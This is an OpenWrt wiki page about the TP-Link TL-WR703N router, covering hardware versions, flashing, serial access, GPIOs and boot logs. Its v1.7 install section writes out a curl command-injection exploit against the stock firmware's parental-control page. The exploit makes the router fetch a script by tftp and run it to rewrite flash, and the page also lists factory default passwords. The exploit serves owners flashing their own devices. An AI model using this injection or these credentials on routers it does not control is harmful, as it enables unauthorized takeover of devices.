Table of Contents

TP-Link TL-WR703N

Pictures

TP-Link TL-WR703N

Clones

Known clones of this device:

Device

Device in OpenWrt Database

These devices are listed in the Table of Hardware:

FIXME: merge this into device database:

Unlike many newer TP-Link devices, there appears to be no hardware differences between the version for the Chinese market and the version for the international market.

Version/Model Launch Date OpenWrt Version Supported Model Specific Notes
v1.0 August 2011 Trunk (r28294) Confirmed working
v1.2 Trunk (r29330) Confirmed working
v1.3 Trunk (r29283) Confirmed working
v1.5 December 2011 Trunk Confirmed working
v1.6 April 2012 Trunk (r39757) Barrier Breaker, trunk (r39757) confirmed working
v1.6(?) March 2013 (FW build 130318) BB(14.07) AA confirmed working, BB too
v1.6(?) March 2013 (FW build 130321, original FW rel. 37153n) Trunk(r41336) AA confirmed working, BB too
v1.6(?) June 2013 (FW build 130625) AA(12.09) AA confirmed working
v1.7 Dec. 2012 (FW build 121204) AA(12.09) AA confirmed working, trunk (r36641) broken
v1.7 April 2014 (3.17.1 Build 140120 Rel.56593n) Unsupported trunk(r40351) not work
v1.7 April 2014 (3.17.1 Build 140120 Rel.56593n) Trunk (r45157) confirmed working, Chaos Calmer, trunk (r45157)

Installation

Review the warnings below before you flash any images!
  1. Please see generic.flashing for a generic description of the OpenWrt installation process.

Building Custom Images

:!: If you've got a modified version of this hardware which has 16MB of flash, then you will not be able to build images larger than 4MB, even though the bootloader will allow you to subsequently utilize all 16MB of flash (i.e. by adding packages after firstboot). See mb_flash_mod for how to solve this problem.

Warnings / Gotchas

Please check the firmware version first, either:

WARNING If you have a V1.7 firmware, SOME OpenWrt trunks (e.g. r36641) will brick your router, unless you have access to the serial console! NEWER TRUNKS will install without issue via tftp and will work fine.

Below is the version of the new bootloader (which disables the LAN port) of a version 1.7 hardware model (bought in December 2012).

root@tpl2:~# grep -a U-Boot /dev/mtd0ro | cut -d'I' -f1	 
U-Boot 1.1.4 (Sep 25 2012 - 09:04:47)	 

For more info visit this forum topic: https://forum.openwrt.org/viewtopic.php?id=40986

Firmware rev.140120 has admin1/admin1 set for web login/password

Power consumption

This router is standardly powered via USB at 5V. The voltage regulator inside is unknown, but its input voltage should be at least between 3.7V - 5.5V, but not over 5.5V. The device will get damaged at too high voltages*. Maximum current draw at 5V is 185mA (OpenWrt boot), average current draw with WiFi at 18dBm is 100mA, without WiFi 80mA. Hence the average router power consumption is 0.5W, which is incredibly low.

Power consumption will be higher if a USB device is attached to its USB port!

*Hint: If the router seems to be damaged because of a too high voltage, connect 3.3V _after_ the voltage regulator. This replaces the function of the damaged regulator, and the router works again. Be sure to power 5 volts into the micro-usb port at the same time if you want to have the usb port on the device work. More information and a rough diagram here http://img513.imageshack.us/img513/4295/saai.jpg

Serial console

The serial console connector does not utilise the regular TP-Link pinouts. Two pads labelled TP_OUT and TP_IN are the TX and RX signals. 115200 8n1. You have to connect your RS232-USB apdater also to the 5V pin on the board.

Note that the pads can very easily be lifted. There is slightly more mechanical strength if you can solder to the surface-mount components to which the pads are connected–but this also takes care–your device could easily be destroyed. Make sure that your connection is secured so that tension cannot be applied to the solder points when you connect to an external device.

TL-MR703n login: root
password: 5up

Flashing

v1.6 and older: upload the latest stable version via the web interface (default: 192.168.1.1 / admin / admin). Note: that the factory default web interface won't accept a file with a long name. Rename it to openwrt.bin and you won't get a "23002 Error".

v1.7 hardware running 3.17.1 Build 140120 Rel.56593n will reject OpenWrt installation via the web interface, install via tftp instead.

Download latest squashfs-factory.bin for the initial flash. Use a "sysupgrade" file for any future updates if already on openwrt.

To flash from the Chinese web interface, at the present time you would select the last menu item on the left, and then the third submenu item. This initiates a popup with two buttons–the upper right one allows you to browse to find the file you want to flash on your PC, the lower left one initiates the flash.

When you roll over an item on the Chinese web interface, the rollover text will indicate which item you are selecting.

Failsafe mode

When the configuration no longer allows you to log in via any network connection (e.g. lost password), the OpenWrt failsafe mode can be entered via the single "Reset" button on the device. However, in contrast to the generic failsafe instructions, for the TL-WR703N you have to wait for ca. 10 (10-12) seconds before pushing the "Reset" button after powering on the device. If the button is pushed immediately after powering on, the single blue LED will start blinking, supposedly indicating some failsafe firmware recovery mody of the embedded bootloader (not yet discovered how to use it). In this mode, the OpenWrt failsafe is not being started. Instead, wait for slightly longer than 10 seconds and - as soon as the LED starts blinking for the first time after powering on the device, push the "Reset" button for ca. 1-2 seconds. Immediately afterwards, the LED will blink rapidly (multiple Hz) and OpenWrt will be in failsafe mode.
- The above didn't work on a Ver 1.6 box running OpenWrt r33312. To get into failsafe mode, power up the device and wait until the LED starts flashing (about 2Hz). Once it starts flashing (within about 4 seconds) then quickly press the button. The LED will then flash much faster and the device will be in failsafe mode.

Back to original image

tftpboot 0x81000000 wr703nv1_cn_3_12_11_up(110926).bin
erase 0x9f020000 +0x3c0000
cp.b 0x81000000 0x9f020000 0x3c0000
bootm 9f020000

Unbrick Tutorial with TFTP and Serial

Internal images

TP-Link TL-WR703N with GPIO and Power Spudger position to open case

On first image you can see the serial connector labeled TP_IN and TP_OUT on the bottom right. GND is right next to it on the right pin of C55.

on the Third image you have placement of GPIO, powers and some interesting things..

Hi Res images here : https://plus.google.com/u/0/photos/107211980242732541247/albums/5737162394063705409/5737162392085444242

TFTP Install Necessary on v1.7 hardware

I've setup over 15 of the v1.7 hardware nodes with Chaos Calmer trunk r45157, with some nodes running non-stop for weeks without issue. WiFi, USB and ethernet works great; mostly using the WR703n's to support VirtualHere USB-over-IP services. While this works great for me, this could brick your device: proceed at your own risk.

Huge thanks to Interdev for the original sketch. Below are the specific steps that works beautifully for me.

Create Files

Obtain a static BusyBox binary:

curl https://busybox.net/downloads/binaries/busybox-mips > busybox

Download OpenWrt:

curl https://downloads.openwrt.org/snapshots/trunk/ar71xx/generic/openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin -o openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin

Cut the OpenWrt image into 2 parts (this could probably be made faster, or more space-efficient, but I haven't researched details):

dd if=openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin of=i1 bs=1 count=1048576
dd if=openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin of=i2 bs=1 skip=1048576

Create a file named "aa", using the following contents. Don't forget to replace 192.168.0.9 with the IP of your tftp server.

cd /tmp
tftp -gl i1 192.168.0.9
tftp -gl i2 192.168.0.9
tftp -gl busybox 192.168.0.9
chmod 755 busybox 
./busybox dd if=i1 of=/dev/mtdblock1 conv=fsync
./busybox dd if=i2 of=/dev/mtdblock2 conv=fsync
reboot -f

Now you should have 5 files in your TFTP server's folder:

Install OpenWrt

Use the following commands to install OpenWrt on a stock/factory Chinese v1.7 TL-WR703N running 3.17.1 Build 140120. Assuming you have a Linux or BSD-based TFTP server, just run the commands from there. DO NOT POWER OFF EQUIPMENT! INTERRUPTING IT WILL BRICK (and you need a 3.3V serial to revive it).

Again, replace 192.168.0.9 with the IP of your TFTP server, and 192.168.0.100 with the IP assigned to the WR703N.

Each of the following steps are necessary, don't skip them.

Set password to admin42

This is only necessary to complete the OpenWrt install, password will be reset to the default OpenWrt password upon completion of your install.

curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=true' 'http://192.168.0.100/'

Enable parental control

curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer 'http://192.168.0.100/userRpm/ParentCtrlRpm.htm' 'http://192.168.0.100/userRpm/ParentCtrlRpm.htm?ctrl_enable=1&parent_mac_addr=00-00-00-00-00-02&Page=1'

Now, exploit a vulnerability in the stock/factory httpd

The following exploit will run these commands on your WR703N:

cd /tmp ; tftp -gl aa 192.168.0.9; sh aa

DO NOT POWER OFF EQUIPMENT! INTERRUPTING THIS WILL BRICK THE WR703N!

curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer 'http://192.168.0.100/userRpm/ParentCtrlRpm.htm?Modify=0&Page=1' 'http://192.168.0.100/userRpm/ParentCtrlRpm.htm?child_mac=00-00-00-00-00-01&lan_lists=888&url_comment=test&url_0=;cd%20/tmp;&url_1=;tftp%20-gl%20aa%20192.168.0.9;&url_2=;sh%20aa;&url_3=&url_4=&url_5=&url_6=&url_7=&scheds_lists=255&enable=1&Changed=1&SelIndex=0&Page=1&rule_mode=0&Save=%B1%A3+%B4%E6'

Wait until the WR703N starts to blink; OpenWrt is now loading. Check your DHCP server, ARP table, or use nmap, to find the IP address. See OpenWrt – First Login for login instructions.

TL-WR703N Reverse Engineering

GPIOs

The AR933x platform provides 30 GPIOs. Some of them are used by the router for status LEDs, buttons and other stuff. The table below shows the results of investigations:

GPIO Available on WR703N AR9331 Pin POR Value WR703N Name Description MR3020 Name
0R4-EA780 Must have 0 value during bootstrap*WLAN LED/LED4
1R2-SA771 Must have 1 value during bootstrap
2VIAB49 SPI_CS_0Used by SPI FlashSPI_CS_0
3VIAB51 SPI_CLKUsed by SPI FlashSPI_CLK
4VIAA57 SPI_MOSIUsed by SPI FlashSPI_MOSI
5R57-S/R60-SB50 SPI_MISOUsed by SPI FlashSPI_MISO
6R16-SB46 LDOConnected to U6 LDO*LDO
7R15-SA540 *
8R18-EA52 USB_POWERControl USB Host PowerUSB_POWER
9R82-NB681TP_INUART RXDTP_IN
10C55-WA79 TP_OUTUART TXDTP_OUT
11R92-EB48 RESET SWSoft Reset SwitchWPS/RESET SW
12VIAA560 Must have 0 value during bootstrap
13R3-SB661 Must have 0 value during bootstrap
14R11-NA760 Must have 0 value during bootstrap*
15R12-NB650 Must have 0 value during bootstrap*
16R13-NA750 Must have 0 value during bootstrap
17R14-NB641 LAN LED/LED5
18NCA28N/A SLIDE SW1
19
20NCA27N/A SLIDE SW2
21
22
23
24
25
26
27LED2-S/LED3-SB44 LED2/LED3Blue PCB LED3G LED/LED3
28VIAA740 Must have 0 value during bootstrap
29R17-SA530

* on wr703n these can be floating (i.e. resistors removed) and the unit still boots * on wr703n tried to pull up GPIO14 (after removing R11) with 10K, system won't boot, so let it pull down or floating

PCB details

You can get additional details on the PCB in the dedicated PCB Details Wiki page.

Boot log (OpenWrt)

U-Boot 1.1.4 (Aug 27 2011 - 10:39:39) > AP121-2MB (ar9330) U-boot > DRAM: 32 MB led turning on for 1s... id read 0x100000ff flash size 4194304, sector count = 64 Flash: 4 MB Using default environment > In: serial Out: serial Err: serial Net: ag7240_enet_initialize... No valid address in Flash. Using fixed address No valid address in Flash. Using fixed address : cfg1 0x5 cfg2 0x7114 eth0: 00:03:7f:09:0b:ad ag7240_phy_setup eth0 up : cfg1 0xf cfg2 0x7214 eth1: 00:03:7f:09:0b:ad athrs26_reg_init_lan ATHRS26: resetting s26 ATHRS26: s26 reset done ag7240_phy_setup eth1 up eth0, eth1 Autobooting in 1 seconds ## Booting image at 9f020000 ... Uncompressing Kernel Image ... OK > Starting kernel ... > Linux version 2.6.39.4 (juhosg@idared) (gcc version 4.5.4 20110808 (prerelease) (Linaro GCC 4.5-2011.08) ) #1 Tue Sep 20 14:44:37 CEST 2011 bootconsole [early0] enabled CPU revision is: 00019374 (MIPS 24Kc) SoC: Atheros AR9330 rev 1 Clocks: CPU:400.000MHz, DDR:400.000MHz, AHB:200.000MHz, Ref:25.000MHz Determined physical RAM map: memory: 02000000 @ 00000000 (usable) Initrd not found or empty - disabling initrd Zone PFN ranges: Normal 0x00000000 -> 0x00002000 Movable zone start PFN for each node early_node_map[1] active PFN ranges 0: 0x00000000 -> 0x00002000 Built 1 zonelists in Zone order, mobility grouping on. Total pages: 8128 Kernel command line: board=TL-WR703N console=ttyATH0,115200 rootfstype=squashfs,jffs2 noinitrd PID hash table entries: 128 (order: -3, 512 bytes) Dentry cache hash table entries: 4096 (order: 2, 16384 bytes) Inode-cache hash table entries: 2048 (order: 1, 8192 bytes) Primary instruction cache 64kB, VIPT, 4-way, linesize 32 bytes. Primary data cache 32kB, 4-way, VIPT, cache aliases, linesize 32 bytes Writing ErrCtl register=00000000 Readback ErrCtl register=00000000 Memory: 29376k/32768k available (2009k kernel code, 3392k reserved, 386k data, 180k init, 0k highmem) SLUB: Genslabs=9, HWalign=32, Order=0-3, MinObjects=0, CPUs=1, Nodes=1 NR_IRQS:80 Calibrating delay loop... 265.42 BogoMIPS (lpj=1327104) pid_max: default: 32768 minimum: 301 Mount-cache hash table entries: 512 NET: Registered protocol family 16 MIPS: machine is TP-LINK TL-WR703N v1 bio: create slab <bio-0> at 0 Switching to clocksource MIPS NET: Registered protocol family 2 IP route cache hash table entries: 1024 (order: 0, 4096 bytes) TCP established hash table entries: 1024 (order: 1, 8192 bytes) TCP bind hash table entries: 1024 (order: 0, 4096 bytes) TCP: Hash tables configured (established 1024 bind 1024) TCP reno registered UDP hash table entries: 256 (order: 0, 4096 bytes) UDP-Lite hash table entries: 256 (order: 0, 4096 bytes) NET: Registered protocol family 1 squashfs: version 4.0 (2009/01/31) Phillip Lougher JFFS2 version 2.2 (NAND) (SUMMARY) (LZMA) (RTIME) (CMODE_PRIORITY) (c) 2001-2006 Red Hat, Inc. msgmni has been set to 57 io scheduler noop registered io scheduler deadline registered (default) Serial: 8250/16550 driver, 1 ports, IRQ sharing disabled ar933x-uart: ttyATH0 at MMIO 0x18020000 (irq = 11) is a AR933X UART console [ttyATH0] enabled, bootconsole disabled console [ttyATH0] enabled, bootconsole disabled Atheros AR71xx SPI Controller driver version 0.2.4 m25p80 spi0.0: found s25sl032a, expected m25p80 m25p80 spi0.0: s25sl032a (4096 Kbytes) Searching for RedBoot partition table in spi0.0 at offset 0x3e0000 Searching for RedBoot partition table in spi0.0 at offset 0x3f0000 No RedBoot partition table detected in spi0.0 spi0.0: no WRT160NL signature found Creating 5 MTD partitions on "spi0.0": 0x000000000000-0x000000020000 : "u-boot" 0x000000020000-0x000000120000 : "kernel" 0x000000120000-0x0000003f0000 : "rootfs" mtd: partition "rootfs" set to be root filesystem mtd: partition "rootfs_data" created automatically, ofs=2A0000, len=150000 0x0000002a0000-0x0000003f0000 : "rootfs_data" 0x0000003f0000-0x000000400000 : "art" 0x000000020000-0x0000003f0000 : "firmware" ag71xx_mdio: probed eth0: Atheros AG71xx at 0xb9000000, irq 4 Atheros AR71xx hardware watchdog driver version 0.1.0 TCP westwood registered NET: Registered protocol family 17 802.1Q VLAN Support v1.8 Ben Greear <greearb@candelatech.com> All bugs added by David S. Miller <davem@redhat.com> VFS: Mounted root (squashfs filesystem) readonly on device 31:2. Freeing unused kernel memory: 180k freed linput: gpio-keys-polled as /devices/platform/gpio-keys-polled/input/input0 Button Hotplug driver version 0.4.1 - preinit - Press the [f] key and hit [enter] to enter failsafe mode eth0: link up (100Mbps/Full duplex) - regular preinit - JFFS2 notice: (371) jffs2_build_xattr_subsystem: complete building xattr subsystem, 17 of xdatum (0 unchecked, 16 orphan) and 30 of xref (0 dead, 16 orphan) found. switching to jffs2 - init - > Please press Enter to activate this console. eth0: link down device eth0 entered promiscuous mode Compat-wireless backport release: compat-wireless-2011-08-25 Backport based on wireless-testing.git master-2011-09-14 cfg80211: Calling CRDA to update world regulatory domain eth0: link up (100Mbps/Full duplex) br-lan: port 1(eth0) entering forwarding state br-lan: port 1(eth0) entering forwarding state SCSI subsystem initialized usbcore: registered new interface driver usbfs usbcore: registered new interface driver hub usbcore: registered new device driver usb cfg80211: World regulatory domain updated: cfg80211: (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp) cfg80211: (2402000 KHz - 2472000 KHz @ 40000 KHz), (300 mBi, 2000 mBm) cfg80211: (2457000 KHz - 2482000 KHz @ 20000 KHz), (300 mBi, 2000 mBm) cfg80211: (2474000 KHz - 2494000 KHz @ 20000 KHz), (300 mBi, 2000 mBm) cfg80211: (5170000 KHz - 5250000 KHz @ 40000 KHz), (300 mBi, 2000 mBm) cfg80211: (5735000 KHz - 5835000 KHz @ 40000 KHz), (300 mBi, 2000 mBm) ieee80211 phy0: Atheros AR9330 Rev:1 mem=0xb8100000, irq=2 cfg80211: Calling CRDA for country: US PPP generic driver version 2.4.2 ip_tables: (C) 2000-2006 Netfilter Core Team cfg80211: Regulatory domain changed to country: US cfg80211: (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp) cfg80211: (2402000 KHz - 2472000 KHz @ 40000 KHz), (300 mBi, 2700 mBm) cfg80211: (5170000 KHz - 5250000 KHz @ 40000 KHz), (300 mBi, 1700 mBm) cfg80211: (5250000 KHz - 5330000 KHz @ 40000 KHz), (300 mBi, 2000 mBm) cfg80211: (5490000 KHz - 5600000 KHz @ 40000 KHz), (300 mBi, 2000 mBm) cfg80211: (5650000 KHz - 5710000 KHz @ 40000 KHz), (300 mBi, 2000 mBm) cfg80211: (5735000 KHz - 5835000 KHz @ 40000 KHz), (300 mBi, 3000 mBm) NET: Registered protocol family 24 ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver ar71xx-ehci ar71xx-ehci: Atheros AR91xx built-in EHCI controller ar71xx-ehci ar71xx-ehci: new USB bus registered, assigned bus number 1 ar71xx-ehci ar71xx-ehci: irq 3, io mem 0x1b000000 ar71xx-ehci ar71xx-ehci: USB 2.0 started, EHCI 1.00 hub 1-0:1.0: USB hub found hub 1-0:1.0: 1 port detected nf_conntrack version 0.5.0 (461 buckets, 1844 max) usb 1-1: new high speed USB device number 2 using ar71xx-ehci ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver Initializing USB Mass Storage driver... scsi0 : usb-storage 1-1:1.0 usbcore: registered new interface driver usb-storage USB Mass Storage support registered. scsi 0:0:0:0: Direct-Access Kingston DataTraveler 2.0 1.00 PQ: 0 ANSI: 2 sd 0:0:0:0: [sda] 7856128 512-byte logical blocks: (4.02 GB/3.74 GiB) sd 0:0:0:0: [sda] Write Protect is off sd 0:0:0:0: [sda] Assuming drive cache: write through sd 0:0:0:0: [sda] Assuming drive cache: write through sda: sda1 sd 0:0:0:0: [sda] Assuming drive cache: write through sd 0:0:0:0: [sda] Attached SCSI removable disk > > > BusyBox v1.18.5 (2011-09-17 19:36:07 CEST) built-in shell (ash) Enter 'help' for a list of built-in commands. > _______ ________ __ | |.-----.-----.-----.| | | |.----.| |_ | - || _ | -__| || | | || _|| _| |_______|| __|_____|__|__||________||__| |____| |__| W I R E L E S S F R E E D O M ATTITUDE ADJUSTMENT (bleeding edge, r28258) ---------- * 1/4 oz Vodka Pour all ingredients into mixing * 1/4 oz Gin tin with ice, strain into glass. * 1/4 oz Amaretto * 1/4 oz Triple sec * 1/4 oz Peach schnapps * 1/4 oz Sour mix * 1 splash Cranberry juice ----------------------------------------------------- root@OpenWrt:/# cat /proc/cpuinfo system type : Atheros AR9330 rev 1 machine : TP-LINK TL-WR703N v1 processor : 0 cpu model : MIPS 24Kc V7.4 BogoMIPS : 265.42 wait instruction : yes microsecond timers : yes tlb_entries : 16 extra interrupt vector : yes hardware watchpoint : yes, count: 4, address/irw mask: [0x0000, 0x0ff8, 0x0ff8, 0x0ff8] ASEs implemented : mips16 shadow register sets : 1 kscratch registers : 0 core : 0 VCED exceptions : not available VCEI exceptions : not available > root@OpenWrt:/#


Boot log (Factory)

U-Boot 1.1.4 (Aug 27 2011 - 10:39:39) AP121-2MB (ar9330) U-boot DRAM: 32 MB led turning on for 1s... id read 0x100000ff flash size 4194304, sector count = 64 Flash: 4 MB Using default environment In: serial Out: serial Err: serial Net: ag7240_enet_initialize... No valid address in Flash. Using fixed address No valid address in Flash. Using fixed address : cfg1 0x5 cfg2 0x7114 eth0: 00:03:7f:09:0b:ad ag7240_phy_setup eth0 up : cfg1 0xf cfg2 0x7214 eth1: 00:03:7f:09:0b:ad athrs26_reg_init_lan ATHRS26: resetting s26 ATHRS26: s26 reset done ag7240_phy_setup eth1 up eth0, eth1 Autobooting in 1 seconds ## Booting image at 9f020000 ... Uncompressing Kernel Image ... OK Starting kernel ... Booting AR9330(Hornet)... Linux version 2.6.31--LSDK-9.2.0.312 (root@bogon) (gcc version 4.3.3 (GCC) ) #128 Fri Aug 26 14:58:53 CST 2011 flash_size passed from bootloader = 4 CPU revision is: 00019374 (MIPS 24Kc) Determined physical RAM map: memory: 02000000 @ 00000000 (usable) User-defined physical RAM map: memory: 02000000 @ 00000000 (usable) Zone PFN ranges: Normal 0x00000000 -> 0x00002000 Movable zone start PFN for each node early_node_map[1] active PFN ranges 0: 0x00000000 -> 0x00002000 Built 1 zonelists in Zone order, mobility grouping on. Total pages: 8128 Kernel command line: console=ttyS0,115200 root=31:02 rootfstype=squashfs init=/sbin/init mtdparts=ar7240-nor0:128k(u-boot),1024k(kernel),2816(rootfs),64k(config),64k(ART) mem=32M PID hash table entries: 128 (order: 7, 512 bytes) Dentry cache hash table entries: 4096 (order: 2, 16384 bytes) Inode-cache hash table entries: 2048 (order: 1, 8192 bytes) Primary instruction cache 64kB, VIPT, 4-way, linesize 32 bytes. Primary data cache 32kB, 4-way, VIPT, cache aliases, linesize 32 bytes Writing ErrCtl register=00000000 Readback ErrCtl register=00000000 Memory: 29864k/32768k available (1888k kernel code, 2904k reserved, 524k data, 116k init, 0k highmem) Hierarchical RCU implementation. NR_IRQS:128 plat_time_init: plat time init done Calibrating delay loop... 266.24 BogoMIPS (lpj=532480) Mount-cache hash table entries: 512 NET: Registered protocol family 16 ===== ar7240_platform_init: 0 Whoops! This kernel is for product wr703 v1.0! bio: create slab <bio-0> at 0 SCSI subsystem initialized usbcore: registered new interface driver usbfs usbcore: registered new interface driver hub usbcore: registered new device driver usb NET: Registered protocol family 2 IP route cache hash table entries: 1024 (order: 0, 4096 bytes) TCP established hash table entries: 1024 (order: 1, 8192 bytes) TCP bind hash table entries: 1024 (order: 0, 4096 bytes) TCP: Hash tables configured (established 1024 bind 1024) TCP reno registered NET: Registered protocol family 1 AR7240 GPIOC major 0 squashfs: version 4.0 (2009/01/31) Phillip Lougher NTFS driver 2.1.29 [Flags: R/O]. msgmni has been set to 58 alg: No test for lzma (lzma-generic) alg: No test for stdrng (krng) io scheduler noop registered io scheduler anticipatory registered io scheduler deadline registered io scheduler cfq registered (default) Serial: 8250/16550 driver, 1 ports, IRQ sharing disabled ttyS0: detected caps 00000000 should be 00000100 serial8250.0: ttyS0 at MMIO 0xb8020000 (irq = 19) is a 16550A console [ttyS0] enabled PPP generic driver version 2.4.2 NET: Registered protocol family 24 cmdlinepart partition parsing not available set partition boot set partition kernel set partition rootfs set partition config set partition art set partition arching for RedBoot partition table 5 RedBoot partitions found on MTD device ar7240-nor0 Creating 5 MTD partitions on "ar7240-nor0": 0x000000000000-0x000000020000 : "boot" 0x000000020000-0x000000120000 : "kernel" 0x000000120000-0x0000003e0000 : "rootfs" 0x0000003e0000-0x0000003f0000 : "config" 0x0000003f0000-0x000000400000 : "art" ->Oops: flash id 0x10215 . ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver Port Status 1c000004 ar7240-ehci ar7240-ehci.0: ATH EHCI ar7240-ehci ar7240-ehci.0: new USB bus registered, assigned bus number 1 ehci_reset Intialize USB CONTROLLER in host mode: 3 ehci_reset Port Status 1c000000 ar7240-ehci ar7240-ehci.0: irq 3, io mem 0x1b000000 ehci_reset Intialize USB CONTROLLER in host mode: 3 ehci_reset Port Status 1c000000 ar7240-ehci ar7240-ehci.0: USB 2.0 started, EHCI 1.00 usb usb1: configuration #1 chosen from 1 choice hub 1-0:1.0: USB hub found hub 1-0:1.0: 1 port detected TCP cubic registered NET: Registered protocol family 17 802.1Q VLAN Support v1.8 Ben Greear <greearb@candelatech.com> All bugs added by David S. Miller <davem@redhat.com> ar7240wdt_init: Registering WDT success VFS: Mounted root (squashfs filesystem) readonly on device 31:2. Freeing unused kernel memory: 116k freed ====>slow_led_expire 621: here ===>slow_led_expire 625: off init started: BusyBox v1.01 (2011.04.01-07:49+0000) multi-call binary ====>slow_led_expire 621: here ===>slow_led_expire 636: on This Board use 2.6.31 xt_time: kernel timezone is -0000 nf_conntrack version 0.5.0 (512 buckets, 5120 max) ====>slow_led_expire 621: here ===>slow_led_expire 625: off ip_tables: (C) 2000-2006 Netfilter Core Team insmod: cannot open module `/lib/modules/2.6.31/kernel/iptable_raw.ko': No such file or directory ====>slow_led_expire 621: here ===>slow_led_expire 636: on insmod: cannot open module `/lib/modules/2.6.31/kernel/flashid.ko': No such file or directory PPPoL2TP kernel driver, V1.0 PPTP driver version 0.8.3 insmod: cannot open module `/lib/modules/2.6.31/kernel/harmony.ko': No such file or directory ====>slow_led_expire 621: here ===>slow_led_expire 625: off (none) mips #128 Fri Aug 26 14:58:53 CST 2011 (none) (none) login: Now flash open! Now flash open! ====>slow_led_expire 621: here ===>slow_led_expire 636: on ATHR_GMAC: Length per segment 1536 ATHR_GMAC: fifo cfg 3 01f00140 ATHR_GMAC: Mac address for unit 1:bf1f0006 ATHR_GMAC: 12:64:c3:58:67:a4 ATHR_GMAC: Max segments per packet : 1 ATHR_GMAC: Max tx descriptor count : 40 ATHR_GMAC: Max rx descriptor count : 96 ATHR_GMAC: Mac capability flags : 4D83 ATHR_GMAC: Mac address for unit 0:bf1f0000 ATHR_GMAC: 01:9c:b5:c8:b7:c9 ====>slow_led_expire 621: here ===>slow_led_expire 625: off ATHR_GMAC: Max segments per packet : 1 ATHR_GMAC: Max tx descriptor count : 40 ATHR_GMAC: Max rx descriptor count : 252 ATHR_GMAC: Mac capability flags : 4403 athr_gmac_ring_alloc Allocated 640 at 0x81e77800 athr_gmac_ring_alloc Allocated 4032 at 0x81d63000 Setting Drop CRC Errors, Pause Frames and Length Error frames Setting PHY...mac 0 ====>slow_led_expire 621: here ===>slow_led_expire 636: on ====>slow_led_expire 621: here ===>slow_led_expire 625: off ====>slow_led_expire 621: here ===>slow_led_expire 636: on athr_gmac_ring_alloc Allocated 640 at 0x81e77400 athr_gmac_ring_alloc Allocated 1536 at 0x81f25000 ====>slow_led_expire 621: here ===>slow_led_expire 625: off ====>slow_led_expire 621: here ===>slow_led_expire 636: on athr_gmac_mii_setup: MDC check failed Setting Drop CRC Errors, Pause Frames and Length Error frames ATHRS26: resetting s26 ATHRS26: s26 reset done Setting PHY...mac 1 ====>slow_led_expire 621: here ===>slow_led_expire 625: off device eth0 entered promiscuous mode Now flash open! ====>slow_led_expire 621: here ===>slow_led_expire 636: on ====>slow_led_expire 621: here ===>slow_led_expire 625: off ====>slow_led_expire 621: here ===>slow_led_expire 636: on nf_conntrack_rtsp v0.6.21 loading nf_nat_rtsp v0.6.21 loading ====>slow_led_expire 621: here ===>slow_led_expire 625: off asf: module license 'Proprietary' taints kernel. Disabling lock debugging due to kernel taint ====>slow_led_expire 621: here ===>slow_led_expire 636: on ath_hal: 0.9.17.1 (AR9380, DEBUG, REGOPS_FUNC, WRITE_EEPROM, 11D) ath_rate_atheros: Copyright (c) 2001-2005 Atheros Communications, Inc, All Rights Reserved ath_dev: Copyright (c) 2001-2007 Atheros Communications, Inc, All Rights Reserved ====>slow_led_expire 621: here ===>slow_led_expire 625: off ====>slow_led_expire 621: here ath_ahb: 9.2.0_U5.508 (Atheros/multi-bss) Boostrap clock 25MHz ar9300RadioAttach: Need analog access recipe!! Restoring Cal data from Flash ath_get_caps[4735] rx chainmask mismatch actual 1 sc_chainmak 0 ath_get_caps[4710] tx chainmask mismatch actual 1 sc_chainmak 0 wifi0: Atheros 9380: mem=0xb8100000, irq=2 wlan_vap_create : enter. devhandle=0x80c042c0, opmode=IEEE80211_M_HOSTAP, flags=0x1 wlan_vap_create : exit. devhandle=0x80c042c0, opmode=IEEE80211_M_HOSTAP, flags=0x1. VAP device ath0 created DES SSID SET=TP-LINK_620550 ieee80211_scan_unregister_event_handler: Failed to unregister evhandler=c0a048a0 arg=81fa8ac0 wlan_vap_delete : enter. vaphandle=0x80e60000 wlan_vap_delete : exit. vaphandle=0x80e60000 wlan_vap_create : enter. devhandle=0x80c042c0, opmode=IEEE80211_M_HOSTAP, flags=0x1 wlan_vap_create : exit. devhandle=0x80c042c0, opmode=IEEE80211_M_HOSTAP, flags=0x1. VAP device ath0 created DES SSID SET=TP-LINK_620550 ieee80211_ioctl_siwmode: imr.ifm_active=393856, new mode=3, valid=1 WARNING: Fragmentation with HT mode NOT ALLOWED!! device ath0 entered promiscuous mode br0: port 2(ath0) entering forwarding state ieee80211_ioctl_siwmode: imr.ifm_active=1442432, new mode=3, valid=1 br0: port 2(ath0) entering disabled state DES SSID SET=TP-LINK_620550 br0: port 2(ath0) entering forwarding state


MTD

cat /proc/mtd

dev:    size   erasesize  name
mtd0: 00020000 00010000 "u-boot"
mtd1: 000d9fa8 00010000 "kernel"
mtd2: 002f6058 00010000 "rootfs"
mtd3: 000f0000 00010000 "rootfs_data"
mtd4: 00010000 00010000 "art"
mtd5: 003d0000 00010000 "firmware"

USB port and monitoring Serial Console via USB-Serial

The USB port on the WR703n is not compatible with USB1 devices (aka full speed) and only works properly with USB2 (aka high speed) devices. You can however plug a USB-Serial adapter as long as you plug that through a <$10 USB2. While you're at it, use another USB port to plug in a USB key and write data there (like serial console logs) so as not to wear out the built in flash.

See this page for more tips and how to create a serial console server out of your WR703n: http://marc.merlins.org/perso/linux/post_2012-12-05_Serial-Console-With-WR703N.html

GPS Tracking Example

Here is a recipe for gps tracking using a usb gps module. https://forum.openwrt.org/viewtopic.php?pid=185438

Software Mods

DIY Projects

Bootloader Mods

Hardware Mods

Note: If you are a beginner, you should inform yourself about soldering in general and even then obtain some experience!

Here are some interesting hardware modifications for the TL-WR703N, from the OpenWrt forum:

Webradio device

